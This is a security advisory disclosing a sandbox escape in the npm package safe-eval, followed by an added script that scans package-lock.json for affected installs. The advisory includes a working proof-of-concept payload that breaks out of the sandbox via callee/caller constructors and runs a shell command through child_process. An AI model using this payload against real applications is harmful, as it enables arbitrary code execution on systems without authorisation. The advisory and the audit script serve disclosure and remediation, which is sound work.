GHSA-9pcf-h8q9-63f6

Published: 03 Sep 2020
Source: github
GitHub: Reviewed

Description

Sandbox Breakout / Arbitrary Code Execution in safe-eval

All versions of safe-eval are vulnerable to Sandbox Escape leading to Remote Code Execution. A payload chaining a function's callee and caller constructors can escape the sandbox and execute arbitrary code.

For example, the payload

```js
(() => {
  const targetKey = Object.keys(this)[0];
  Object.defineProperty(this, targetKey, {
    get: function() {
      return arguments.callee.caller.constructor(
        "return global.process.mainModule.require('child_process').execSync('pwd').toString()"
      )();
    }
  });
})();
```

may be used to print the `pwd` to the console.

## Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.

Packages

| Name | Affected versions | Fixed version |
| --- | --- | --- |
| safe-eval (npm) | >= 0.0.0 | None |
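
Since every version is affected and no fixed release exists, the first remediation step is finding where safe-eval is installed and which packages pull it in. The following is an added example (not part of the advisory or the safe-eval project) that scans a parsed `package-lock.json`; the sample lockfile, the names `demo-app` and `demo-rule-engine`, and all version numbers in it are constructed for illustration.

```javascript
// Added example. Facts from the advisory: npm package "safe-eval", affected ">= 0.0.0", no fix.
const AFFECTED = 'safe-eval';
// Matches the trailing "node_modules/<name>" or "node_modules/@scope/<name>" of a lock key.
const NM = /(?:^|\/)node_modules\/((?:@[^\/]+\/)?[^\/]+)$/;

// lock: parsed package-lock.json, e.g. JSON.parse(fs.readFileSync('package-lock.json', 'utf8')).
// Returns { installs: [{ path, version }], requiredBy: [package names] }.
function auditLock(lock, name = AFFECTED) {
  const installs = [];
  const requiredBy = new Set();
  if (lock.packages) {
    // lockfileVersion 2/3: flat map keyed by install path; "" is the project itself.
    for (const [path, meta] of Object.entries(lock.packages)) {
      const m = NM.exec(path);
      if (m && m[1] === name) installs.push({ path, version: meta.version });
      const wants = { ...meta.dependencies, ...meta.devDependencies, ...meta.optionalDependencies };
      if (name in wants) requiredBy.add(m ? m[1] : path || '(root project)');
    }
  } else {
    // lockfileVersion 1: nested tree; direct project dependencies live in package.json,
    // so only packages that pull the module in transitively show up in requiredBy.
    const walk = (deps, trail) => {
      for (const [dep, meta] of Object.entries(deps || {})) {
        const here = [...trail, dep];
        if (dep === name) installs.push({ path: here.join(' > '), version: meta.version });
        if (meta.requires && name in meta.requires) requiredBy.add(dep);
        walk(meta.dependencies, here);
      }
    };
    walk(lock.dependencies, []);
  }
  return { installs, requiredBy: [...requiredBy].sort() };
}

// Constructed sample lockfile: "demo-app" and "demo-rule-engine" are hypothetical names,
// and all version numbers are made up for the illustration.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', dependencies: { 'demo-rule-engine': '^1.0.0' } },
    'node_modules/demo-rule-engine': { version: '1.0.0', dependencies: { 'safe-eval': '^0.0.1' } },
    'node_modules/demo-rule-engine/node_modules/safe-eval': { version: '0.0.1' },
  },
};

console.log(JSON.stringify(auditLock(SAMPLE_LOCK), null, 2));
```

Any entry in `installs` is affected regardless of its version; `requiredBy` names the packages to replace or patch out in order to remove it.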